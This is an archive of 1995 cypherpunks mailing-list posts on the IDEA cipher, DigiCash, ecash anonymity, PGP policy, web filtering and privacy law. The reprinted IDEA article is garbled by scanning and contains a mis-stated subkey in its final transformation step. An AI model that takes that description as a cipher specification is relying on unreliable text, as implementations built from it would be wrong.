From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 28 Oct 95 05:50:17 PDT
To: cypherpunks@toad.com
Subject: EE Times on IDEA
Message-ID: <199510281250.NAA14958@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Electronic Engineering Times
Oct 23, 1995 p. 66

T.R MADHUSUDAN SASTRY,
T. GANESAN, B.MADHUKAR
AND N. SRINIVASA

MOTOROLA INDIA ELECTRONICS Pvt. Ltd.
BANGALORE, INDIA

Time is right for a good, secure 'Idea'

Computers are the medium in which almost all of today's business deals and international transaction transpire. That calls for the development of secure systems, which protect data from being accessed by unautho-rized users. Digital Encryption Standard (DES) is a cipher system that uses a 64-bit-long secret key. With present comput-er technology, it is not difficult to break DES by trying all possible keys. That made cryptographers look for different encryption algorithms that take a long time for today's computers to break the code. The International Data Encryption Algorithm (Idea) is a private key-block ciphering scheme, which is computationally highly secure since it uses a 128-bit-long secret key. The brute force method of breaking the code, (trying all possible combinations as keys) would require 10^24 years for a chip that can test a billion keys per second. The design philosophy of Idea is to niix the operations from different algebraic groups to add confusion and di!
 ffusion to the input data. The operations are addition modulo, multiplication modulo, and exclusive OR (XOR).

We have implemented Idea in electronic-code-book (ECB) mode on the Motorola DSP 561xx family of processors. In ECB mode, a 64 bit input block is encrypted to generate a 64-bit output block that is transmitted to the receiver through insecure but error free channels. In Idea, all the algebraic operations work with 16-bit blocks of data. That makes the algorithm efficient on a 56 to DSP, which has a very good instructioln set to perform the addi-tion modulo 2^16, multiplication modulo 2^16 + 1 and 16-bit XOR operations.

The Idea is a block-cipher scheme in which the incoming data is divided into blocks of 64 bits and fed as input to the encryption algorithm (see figure). The 64 bit data X= (X1 X2 X3 . . . X64) is initially divided into 4 subblocks X1, X2, X3 and X4each of 16 bits. These four sub-blocks become input for the first round of operation. In each round, each subblock is added and multiplied under modulo fields with key subblocks, thus adding more confusion and diision.

The sequence of operations for the first round is given below; it's the same for all rounds of operations except for different key subblocks.

[1] Multiply X1 and Kl, (first key subblock Zl^l) under modulo 2^16 + 1
[2] Add X2 and K2 (Z2^1) under modulo 2^16
[3] Add X3 and K3 under modulo 2^16  
[4] Multiply X4 and K4 under modulo 2^16 + 1
[5] XOR the results of step 1 and step 3
[6] XOR the results of step 2 and step 4
[7] Multiply the results of step 5 and K5 under modulo 2^l6 + 1
[8] Add the results of step 6 and step 7
[9] Multiply the re sults of step 8 and K6 under modulo 2^16 + 1 .
[10] Add the results of step 7 and step 9 under modulo 2^16
[11] XOR the results of step 1 and step 9
[12] XOR the results of step 3 and step 9
[13] XOR the results of step 2 and step 10
[14] XOR the results of step 4 and step 10

The results of each round from steps 11, 12, 13, and 14 form the  input blocks for the second round of opera-
tion after swapping the two inner blocks (see figure). After eight rounds are over, the following transformation has to be done before taking output cipher text. It should be noted that swapping is not done for the
last round.

[1] Multiply X1 and the 49th key subblock K49 (Z1^9)
[2] Add X2 and the 50th key subblock to k50 (Z2^9)
[3] Add X3 and the 51st key subblock k51 (Z3^9)
[4] Multiply X4 and the 52nd key subblock K51(Z3^9)

The decryption algorithm is also exactly the same except for the change in the subblock keys. From each of the key subblocks in the encryption, either additive inverse or multipli
cative inverse is used. For example, the subblock key used to multiply this data subblock is re placed with its multiplicative inverse. Also the order in which that multiplicative and additive inverse occurs in the decryption algorithm takes care of the shuffling of the intermediate data subblocks.

As stated earlier the encryption key is 128 bits long. The 52 encryption subblock keys are derived from the encryption key, and the corresponding subblock keys are derived from the encryption-key subblocks. The key subblocks for the first round of encryption are derived by dividing the 128-bit-long key into 16-bit blocks. Then, for every next round, the encryption key is circularly shifted by 25 bits and then divided into 16-bit blocks to yield encryption-key subblocks. In the last round, only the first four key subblocks are generated.

The Idea can be implemented in all three modes of operation: ECB, output-feedback mode (OFB) and cipher-feedback mode (CFB). In ECB, the input is split into 64-bit blocks, encrypted and transmitted. In CFB, the output cipher text from one block of encryption is used to form part of in input block. And the output of the algorithm is XORed with the input plain text, and transmitted. Similarly, the feedback is taken after
the XORing operation. In thepresent implementation, only ECB mode is done, which is the fastest among the three.

Since all the operations are on 16-bit blocks, the powerful instruction set of 561xx can beused for efficient implementation. The modulo 2^16 + 1 multiplication operation is used many times, and it is computationally intensive when compared with XOR and modulo 2^16 addition. The fixed-point multiplication construction of 561xx can be utilized to perform 32-bit multiplication.

The modulo 2^16 addition operation can be done just by ignoring the carry of 16-bit addition in 561xx. The XOR operation is also supported in one instruction as in any other DSP processor. Hence all three algebraic operations can be implemented efficiently using the instruction set of 561xx

Again the decryption algorithm is exactly the same as the encryption algorithm, except, that the decryption-key sub block is used instead of encryption. The whole program can be reused for decryption by changing the input variables and output variables.

Circular shift 
The main computation in encryption-key subblock generation is the circular shift of the l28-bit-long key. The encryption key can be stored as eight words in memory. In the present implementation, instead of shifting the key circularly, the mask patterns are used to pick up suitable key subblocks. That is, the second set of eight key subblocks can be generated by picking up 16 bits from the ninth bit of the second word of the encryption key.                 

Hence, for each round, we need to multiply each encryption key word by a suitable mask pattern, and left shift it with a suitable number of bits. The left-shifting operation for any arbitrary number of bits can be performed using the integer multiplication. Storing the mask patterns can be eliminated by using the shifted version
of left-shift constants as right-shift constants. The left-shift constant is multiplied with the current encryption-key word, and the right-shift constant is multiplied with the next keyword, and both are combined to
generate one key subblock. The right-shift constants are gotten by right shifting the left shift constant by 1 bit, which considerably reduces the computation involved. The current implementation of Idea in ECB on Motorola's DSP 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex mode. That is 3.6
times faster than using the DES algorithm.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 28 Oct 95 01:30:49 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Mark Twain Bank's DigiCash offer
In-Reply-To: <9510271546.AA00580@ch1d157nwk>
Message-ID: <Pine.LNX.3.91.951028163159.21370B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995, Andrew Loewenstern wrote:
 
> The gotcha being that as long as your money is in the "mint" it is not under  
> FDIC protection...  Just how safe your cash is when it is in the mint is  
> entirely related to the security of Mark Twain's systems, which are  
> high-profile machines that will surely be subjected to many cracking  
> attempts.  Some may prefer to keep complete control over their cash and store  
> all of it themselves.  Unlike physical cash, this stuff can be split up,  
> encrypted, and stored in multiple places, possibly offering more security  
> than the Mark Twain "mint."

Unfortunately, it also expires (btw, how soon??):

----- 8< ----- quoted from http://www.marktwain.com/digifaq.html ---------
Once the money is on your hard drive, you can hold it (until expiration 
date - check this often), or spend it. 
--------------------------------------------------------------------------


Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 29 Oct 95 05:13:41 PST
To: cypherpunks@toad.com
Subject: Technology: The Great Deregulator
Message-ID: <v02120d00acb92e17a27f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


St. Pete (Peter Huber, that is) Speaks!

Cheers,
Bob Hettinga


--- begin forwarded text

Date: 27 Oct 1995 14:23:50 GMT
From: khh@access4.digex.net () (by way of rah@shipwright.com (Robert A.
Hettinga))
To: rah@shipwright.com
Subject: Technology: The Great Deregulator
Organization: Express Access Online Communications, Greenbelt, MD USA
Path:
sundog.tiac.net!daily-planet.execpc.com!news.moneng.mei.com!uwm.edu!chi-news
.cic.net!newsfeed.internetmci.com!in2.uu.net!news3.digex.net!access4.digex.n
et!not-for-mail
Newsgroups: alt.politics.economics
Lines: 91
NNTP-Posting-Host: access4-2.digex.net
X-Newsreader: TIN [UNIX 1.3 950824BETA PL0]
X-Newsreader: Value-Added NewsWatcher 2.0b27.1+

     Following is an article by Peter Huber. More articles by Mr. Huber
can be seen at http://khht.com/huber/home.html.

   -----------

   The sun is finally setting on a dismal century of economic commissars.
   Not Russia's, ours. I mean the people who, for most of this century,
   controlled price and output in markets for trucking, air travel,
   railroads, telephone service, cable TV, natural gas and electricity.
   Until recently, these mammoth industries, representing a sizable
   fraction of the U.S. economy, had about as much to do with free-market
   competition as the steel industry in Stalingrad.

   It started with the Interstate Commerce Commission. Established in
   1887, the ICC was to be the federal antidote to rapacious railroad
   monopolies. Perhaps it was, for a while, but in the end it drove them
   into bankruptcy. Meanwhile, local, state and federal legislators set
   up baby ICCs left and right on the assumption that highways,
   pipelines, phone wires and power grids all required much the same
   handling as railway track. In track-like industries, monopolies were
   natural. Competition was wasteful. Commissions were smart enough to
   run things better.

   Most of the people who believed such things died years ago, but the
   government pyramids they built have endured. A great decommissioning
   of economic life in America is now under way. The job is almost
   finished for airlines and trucks. It's inching ahead in the
   communications arena. Electricity is just getting started. We'll find
   out in due course whether Newt Gingrich and Bob Dole can deregulate as
   boldly as Ted Kennedy and Jimmy Carter, who kicked off serious
   economic deregulation in the 1970s.

   As the Kennedy/Carter legacy confirms, the impetus for change isn't
   hatred of government. Nor can the decommissioning of America be blamed
   on right-wing capitulation to big business. We've just learned the
   hard lessons of commissariat collectivism, in much the same way as the
   Hungarians and the Czechs.

   Consumers end-run the regulators. Fed up with prices that force them
   to subsidize residential consumers, factories and hospitals cogenerate
   electricity in their heating plants. They install "private branch"
   telephone exchanges that displace about one-third of the phone service
   they'd otherwise buy from the local phone company. Landlords set up
   rooftop satellite dishes on apartment buildings and sell "private
   cable" service to tenants. When you mow your own lawn, regulators get
   trimmed too: There's no income tax for them to collect, no maternity
   leave to grant, no minimum wage to enforce.

   Technology outwits the regulators. Hub-and-spoke routing and
   yield-maximizing pricing schemes concocted on supercomputers that
   shattered the old Civil Aeronautics Board's point-to-point vision of
   how air travel should operate, and at what price. The FCC's vision of
   "local" broadcasting provided by a few, community-based stations
   collapsed when Ted Turner began bouncing his UHF station off a
   satellite and back down to cable systems nationwide. And billions of
   dollars of commission-prescribed prices will soon have to be
   rejiggered because smart-aleck programmers have worked out how to
   transmit two-way voice conversations live over the Internet. The
   commission's policy is to price voice connections about $ 4 an hour
   higher than "date," but digital technology obliterates the
   distinction.

   Regulators are cannibals. As commissions proliferate, they undercut
   each other. Long distance phone companies and "access providers" like
   Teleport expand under lenient federal control -- at the expense of
   local phone companies kept on a tighter leash by state commissions.
   Wireless phone service has been almost completely deregulated by its
   federal regulators, so it grows far faster than service by way of
   telephone pole, which remains heavily regulated under the price
   regulation maintained by one bureau of the FCC. Direct broadcast
   satellite, cable's competitor, is booming under the hands-off watch of
   another bureau of the same federal commission.

   Regulators invest badly. They direct utilities to put billions in
   overpriced power plants, inefficient wires and extravagant service out
   to the very last ranch at the end of nowhere. Cost is no object; it
   just gets dumped in the "rate base." Competition, when it arrives, is
   devastating, just as the fall of the Berlin wall was devastating to
   the factories that built Trabants.

   In these times of radical technological change, utility monopolies are
   as unstable as politburos. Many of the old-guard enterprises may still
   grow and prosper, but only if they learn to sell to a whole new class
   of buyers. Consumers, not commissars.

--
   Copyright 1995 by Peter Huber. Electronic copies of this document may
   be distributed freely, provided that this notice accompanies all
   copies.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 29 Oct 95 10:27:58 PST
To: cypherpunks@toad.com
Subject: Digicash will not fly
Message-ID: <199510291827.KAA07985@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


While Chaum is a brilliant cryptographer, he is an incompetent businessman

He has demonstrated this in numerous ways.

The latest being "Cash" where the bank skims off 4% to 10% every time.

No one is going to use digicash under these kinds of terms and 
conditions.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Sun, 29 Oct 95 19:22:45 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on IDEA
In-Reply-To: <Pine.SOL.3.91.951030075604.12602E-100000@orb>
Message-ID: <Pine.3.89.9510291955.A29391-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Oct 1995, Eric Young wrote:

> On Sat, 28 Oct 1995, Anonymous wrote:
> > Electronic Engineering Times
> > Oct 23, 1995 p. 66
> > 
> > T.R MADHUSUDAN SASTRY,
> > T. GANESAN, B.MADHUKAR
> > AND N. SRINIVASA
> 
> > involved. The current implementation of Idea in ECB on Motorola's DSP
> > 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex
> > mode. That is 3.6 > times faster than using the DES algorithm. 
> 
> That last statement is rubbish.  For most CPU's I've seen, IDEA is either 
> the same speed as DES or a bit slower.  There is no way that it is 3 
> times faster that single DES.

My implementation of IDEA on the TI TMS320C26 DSP runs at 99 kbytes/sec.
I havent't tried DES, but comparing DES code on the 80x86 to the 'C26 
instruction set, I think the speeds would probably be about the same.

Whatever, these speeds leave plenty of time for simple speech coding in a 
voice encryption system.

---------------------------------------------------------------------
John A. Thomas          | (214) 263-4351   | jathomas@netcom.com
Bowles & Thomas, L.L.P. |      Voice       | CompuServe 75236,3536
410 N.W Eleventh St.    | (214) 262-6520   | 
Grand Prairie, Tx 75050 |       Fax        | PGP public key available
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 95 19:20:08 PST
To: cypherpunks@toad.com
Subject: Re: Important Digital Cash Question...
Message-ID: <199511010319.TAA15603@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>I think that the bankers name should be Ethel however.
>Wait, wait! I have another one. I call digital cash bankers "underwriters",
>because they're basically underwriting digital certificates, like an
>underwriter in the capital markets does.
>So, we need a "U" name...

Obviously Alice and Bob are banking with Chaum....
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 95 19:21:19 PST
To: cypherpunks@toad.com
Subject: Re: ecash remailer
Message-ID: <199511010321.TAA15848@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer and Hal both suggested ecash-laundering methods to provide 
payee anonymity using methods like this:
>Enterprising cypherpunk, Ed sets up the Ecash Remailer.
>Alice pays Bob e$15. Alice is anonymous.
>Bob sends Ed the e$15
>Ed cashes the e$ into his ecash mint account, withdraws e$13.50
>then pays Bob those e$14 .. Bob can now spend those e$ at will.
>	Bob is now anonymous.

As implemented here, Ed is strictly in the money-laundering businesss,
and can expect a visit from the Feds as soon as they can break through
the chain of digital mixes and crypto he uses to operate alt.money.laundry,
or follow the money when _he_ tries to deposit it.  On the other hand,
he could operate a strictly legitimate business, selling financial assets 
such as bearer bonds or low-commission lottery tickets, or converting
funds between different e-banks, or simply offering anonymous bank accounts
with currencies in multiple denominations - Bob can set up an account
with Ed's Eurocurrency Exchange in the name "Public Key nnnnn",
deposit his $15, and withdraw US$14.95 worth of Yen or Deutschmarks or
Kongbucks.

Aside from Bob's need to trust Ed, and his need to trust Alice not to
double-spend (since laundering used bills is much harder than laundering
marked bills) it first looked to me like Ed has a serious risk that he'd
be nabbed by the Feds as soon as he tried to spend the bills, so he has
to trust Bob not to be spending ransom money or pharmaceutical profits.

But as near as I can tell, _any_ merchant has that risk, because there's
no way for Ed to distinguish between cash that Bob withdrew himself
and cash that Bob got from someone else.  Does this mean that anybody
who sells goods to anonymous clients is automatically a money-launderer?
If so, either the bogus money-laundering laws have to go (yay!) 
or laws against selling to anonymous clients will get written (boo!) 
or selective enforcement and entrapment will become increasingly popular, 
leading merchants to refuse to do anonymous business just to defend themselves
against extortionists\\\\\\\\\\\\legitimate needs of law enforcement?
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 95 19:22:00 PST
To: black@suntan.eng.usf.edu
Subject: Re: PGP at Universities
Message-ID: <199511010321.TAA15856@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:37 PM 10/30/95 -0600, James Black black@suntan.eng.usf.edu wrote:
>>I am talking with one of the 
>>administration people about putting PGP on the system for everyone to 
>>use, but there are issues for them (the admin) as they might be liable, 
>>even if they can't read the e-mail.  What other legal considerations 
>>should be evaluated?
>>  Is there any large organizations (like any other universities) that 
>>allow their students to use PGP, and have the system in place to make it 
>>easier for the students?  If it is offered here I might be the one to add 
>>to the mail program (pine) that is generally used to transparently use 
>>PGP, which is what I mean by having a system set up for the encryption. 

Well, one obvious example is MIT, which not only makes PGP available to
its students, it makes it available to everyone else in the US,
though ostensibly not everyone else in the world.  Your University isn't
required to be reading students' and employees' private email anyway,
(though it can get away with it by announcing it as official policy),
so not being able to read it because of PGP is just fine - if anything it
may reduce their legal liability by offering students the option of having
truly private email, where sysadmins won't even be able to read bouncemail
or other fragments of messages left around when mailers break.

On the other hand, I'm guessing that usf.edu is in the USA?  If so, 
there may be ITAR considerations - are any of your students non-US citizens
without Green Cards?  Offensive as it sounds, it may not be legal to let
them use a copy of PGP that you provide (though it's perfectly legal for
them to import copies from the UK for their own use.)  There _are_ privacy-
protecting programs you can let them use, such as the next edition of Netscape,
which has 40-bit RC4, and you can use digital signatures from packages like
RIPEM-SIG, which is a signature-only subset of RIPEM that's approved for export.
Since Netscape 2 will be using X.509 certifications, which RIPEM uses,
you or your students can do things like building good friendly user interfaces
to the current character-menu certification chains that RIPEM provides
(somewhat like PGP's Web of Trust, but a bit clumsier for now.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@digicash.com>
Date: Tue, 31 Oct 95 19:23:43 PST
To: <cypherpunks@toad.com>
Subject: W3 Self-Regulation?
Message-ID: <v03003912acbc72d1d4cf@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


[Where's Tipper when you need her? Answer:]

FOR IMMEDIATE RELEASE

Contact:   Ron Warris, President, Internet Filtering Systems, Inc.
phone:     1-403-258-5804, email: warrisr@colt.t8000.com
Web:       www.tenagra.com/ifsi

DEMOCRATIC WORLD-WIDE WEB SELF-REGULATION ANNOUNCED

CALGARY, ALBERTA, CANADA -- October 30, 1995 -- Internet Filtering Systems,
Inc. (IFSI) today announced Net Shepherd, the first product designed to
democratically rate and filter World Wide Web sites and selectively
supervise access.

Net Shepherd is the first PICS-compliant rating and filtering solution.
Under the auspices of The World Wide Web Consortium, PICS (Platform for
Internet Content Selection) is a cross-industry working group whose goal is
to facilitate the development of technologies to give users control over
the kinds of material to which they and their children have access.

According to Ron Warris, president of IFSI, "There are a number of
companies offering filtering solutions. What is really needed is a rating
solution. How do you go about reviewing and rating 8.5 million volatile
documents on the Internet? Our approach will allow the people who surf the
Internet to be the people who rate the Internet. With Net Shepherd,
parents, educators and other concerned organizations will be able to
voluntarily participate in the rating process.

Mr. Warris continues, "Net Shepherd will also provide parents with the
ability to selectively filter documents viewed by their children. Parents
can choose from a variety of rating databases that represent the
accumulated ratings from others who hold similar views and philosophies.
Organizations that wish to create rating databases for their subscribers
will also be able to use Net Shepherd. You'll be able to subscribe to the
Good Housekeeping database or the Lutheran Church database or the ACLU
database. Take your pick.

"The Internet has always been self-regulating and special-interest-group
oriented. Now the World Wide Web can be as well."

IFSI's mission is to become the preferred and premier provider of Internet
rating systems and services for individual consumers, concerned groups and
associations, as well as other filter software developers. A World-Wide Web
site currently contains basic information about IFSI, and will evolve over
the coming weeks into an extensive resource for those interested in
Internet content filtering. It is located at URL

<http://www.tenagra.com/ifsi/>

From the Web page:

Internet Filtering Systems, Inc. is the developer of Net Shepherd, the
first product designed to democratically rate and filter World Wide Web
sites and selectively supervise access. The Internet has always been
self-regulating and special-interest-group oriented. Now the World Wide Web
can be as well.

Net Shepherd is the first PICS-compliant rating and filtering solution.
Under the auspices of The World Wide Web Consortium, PICS (Platform for
Internet Content Selection) is a cross-industry working group whose goal is
to facilitate the development of technologies to give users control over
the kinds of material to which they and their children have access.

Net Shepherd allows the people who surf the Internet to be the people who
rate the Internet. With Net Shepherd, parents, educators and other
concerned organizations will be able to voluntarily participate in the
rating process. Net Shepherd will also provide parents with the ability to
selectively filter documents viewed by their children. Parents can choose
from a variety of rating databases that represent the accumulated ratings
from others who hold similar views and philosophies. Organizations that
wish to create rating databases for their subscribers will also be able to
use Net Shepherd.

IFSI's mission is to become the preferred and premier provider of Internet
rating systems and services for individual consumers, concerned groups and
associations, as well as other filter software developers.


[cf. PICS (Platform for Internet Content Selection) at
  <http://www.w3.org/pub/WWW/PICS/>]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Tue, 31 Oct 95 18:55:34 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <199511010154.UAA00189@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> The Wall Street Journal, October 31, 1995, p. B6. 
> 
> IBM Announces New Software Code That Is Universal
> 
> By Laurie Hays
> 
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.

Oh Jesus.. now I've seen everything.

Bring forth the holy clue-gernade!

Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 31 Oct 95 19:21:35 PST
To: ecm@ai.mit.edu
Subject: Internet World Boston
Message-ID: <v02120d00acbc95ae5938@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


David Fox has me on a panel discussion he's leading tomorrow (November 1)
at Internet World in Boston in the Harborview Ballroom from 10:15 to 12:30.

Also on the panel will be someone each from First Virtual, Open Market, and
CheckFree, all of whom will be demo-ing their latest stuff. This promises
to be interesting, and it would also be a great opportunity for me to
actually meet some people I only read in e-mail.

If you're around, I hope to see you there!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: walrus <walrus@tcgcs.com>
Date: Sun, 20 Oct 1996 00:34:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [crypto-philo]OTP or DES?
Message-ID: <199610200808.IAA15049@tcgcs.com>
MIME-Version: 1.0
Content-Type: text/plain


There is a thread going in coderpunks about some software company that
claims to have invented a software OTP that uses a PRNG.  The local experts
have ruled that this is impossible and I would have to agree, but this
thread got me thinking.  I would argue that the security of an OTP is
derived not from the fact that it really is secure, but from the fact that
it is claimed to be an OTP.  Imagine a plaintext, encrypted with triple-des.
It looks like a bunch of 1's and 0's to the casual observer, but to you it
is your secret plan to take over the world.  Or so you would have us believe
if we crack the cypher.
actually you plan to take over the world using a completely different plan.
It is quite easy to take the bits of the des-encrypted message, and
calculate the OTP key nessasary to decrypt the message into your real plan.
It would seem you could build a key to have your message say anything of
equal length.  Why then must a true OTP be based on a true RNG?  Because one
of the actual possible keys of a real OTP is indeed the encrypted des
message, you can claim that it is an otp and no-one can prove otherwise.
They can say "But we cracked your des key and can decypher this message!"
and you say "nope i used an OTP, that is a false message, here is what it
really says! The fact that by PURE coincidence that OTP could be decrypted
using that particular key means nothing, because a true OTP can generate
that bit sequence.
So in conclusion i would say that we can give pgp complete and perfect
security but the simple process of changing the header from ---Begin PGP
message--- to
----Begin OTP message----.  This makes you immune from decryption because no
one will ever know or can ever prove that the decryption they got is the
correct one.

Any comments?

Walrus






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 1 Nov 1995 09:43:02 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Cryto article in SJ Mercenary
In-Reply-To: <Pine.SOL.3.91.951031140028.1151G-100000@chivalry>
Message-ID: <199510312340.AAA05687@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> There's a full page equivalent article on encyption in today's San Jose
> Mercury News (12E-11E). The article concentrates on public key
> cryptography, and mixes some good stuff with some silly mistakes. The
> first page has about 4/5th of the article devoted to a big diagram showing
> how someone using public key encryption to cover a whole message, and sent
> it over the internet to someone in Argentina. All this without a mention
> of using symmetric cyphers, and without even mentioning ITAR. 

I don't think ITAR is very relevant here.  After all, there are dozens
of RSA implementations available from outside the US, and they are not
patent-restricted like in the US.  It is really much easier to use and
get RSA *outside* the US than inside.  (For some pointers, see
"http://www.cs.hut.fi/crypto/".)  Besides, as far as I understand, one
of the RSA inventors wasn't even a US citizen...

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 1 Nov 1995 13:58:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ecash remailer
In-Reply-To: <199511010321.TAA15848@ix8.ix.netcom.com>
Message-ID: <199511010542.AAA12674@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Responding to several subthreads at once:

Dave M., I get the feeling we're talking about completely different scenarios.
What I had in mind boils down to the case of Alice laundering money through
Ed with payer (and maybe payee) anonymity, then crying "Thief !" and getting
the bank to trace Ed. Without adding anything else, it's her word against his.

Aleph, I think you raise an important objection. After the money has been
through the wash a few (dozen) times, it's hard to tell whence it came. This 
leads into Bill's point:

Bill writes:
> But as near as I can tell, _any_ merchant has that risk, because there's
> no way for Ed to distinguish between cash that Bob withdrew himself
> and cash that Bob got from someone else.  Does this mean that anybody
> who sells goods to anonymous clients is automatically a money-launderer?
> If so, either the bogus money-laundering laws have to go (yay!) 
> or laws against selling to anonymous clients will get written (boo!) 
> or selective enforcement and entrapment will become increasingly popular, 
> leading merchants to refuse to do anonymous business just to defend 
> themselves against extortionists\\\\\\\\\\\\legitimate needs of law 
> enforcement?

Indeed. But really, _everyone_ who accepts cash and disburses money is a
money launderer. When I hand a bored high school student some cash for
lemonade at a supermarket, the market launders my money. I don't have to be
strongly anonymous. Even if they checked my ID before taking my greenbacks, 
they would have no way of knowing whether those were ill-gotten gains or not.
Monetary value just isn't intrinsically good or bad, period.

Don suggests the use of receipts to counter fraudulent theft claims. But how 
are we to arrange receipts for payer-anonymous transactions ?  With paper 
cash, banker Ursula of course need not worry about double spending, so she 
doesn't have to track which bills have been spent. That makes it hard for
Alice to fraudulently (or truthfully !) accuse Louie the Launderer of theft
via this protocol, unless Alice happens to be the Treasury Dept. 

-Futplex <futplex@pseudonym.com>
Please don't cc: me on replies to the list; I get too much mail as it is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 2 Nov 1995 11:29:47 +0800
To: cypherpunks@toad.com
Subject: Cable TV Privacy (was Re: InfoWar)
Message-ID: <199511010907.AA28156@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner writes:

> David G. Koontz writes:
> > 
> >>Industry representatives played down the privacy loopholes.
> >>Ronald Plesser, a Washington attorney who represents online
> >>services and direct marketing firms, said, "I know of no
> >>example of anybody trafficking in e-mail descriptions." A
> >>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
> >>do not release names of customers that ordered movies.
> > 
> >The name of the customer of a video tape rental may be disclosed
> >only under narrow constraints (USC 18 Chap 121 2710):

> Didn't you read the post?  The whole point was that the constraints
> *don't* cover many *new* technology.  Sure, your local video store
> can't release the data, but your *cable* company is under no such
> constraint with regard to pay-per-view.  Ditto with Hughes DirecTV.

Local cable TV companies *are* constrained re recordkeeping about
consumer choices and disclosure of that data - see 47 USC 551, the
"Cable Television Consumer Protection and Competition Act of 1992".
They must disclose at the time you sign up for service and once
yearly what data they keep about your watching/purchasing choices, and
who that data is disclosed to. They must dispose of that data when it
is no longer useful for the purpose for which it was collected. 
Consumers get liquidated damages of the greater of $100 per day or
$1000, plus attorney's fees and (maybe) punitive damages.

But I agree that cable TV != DirecTV, and that Hughes seems to be
unregulated in this field.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJc4e33YhjZY3fMNAQFJJAP+M0G3St6Bhtjxzukt6kmjUsBQO2htEY1/
RVaIpitdsT/mXBHzrlkE8zC6kBTwK2vFha47vSUO4WyOfEvS02sbzY99XR7VwuIo
z/LTgFpc89ZLxFOYEPITZ/7AV/8+8Yau3FmlNOrfBnhQTOPlCFOfWeUEYaZFi1BH
64bpq1copqk=
=CWe+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
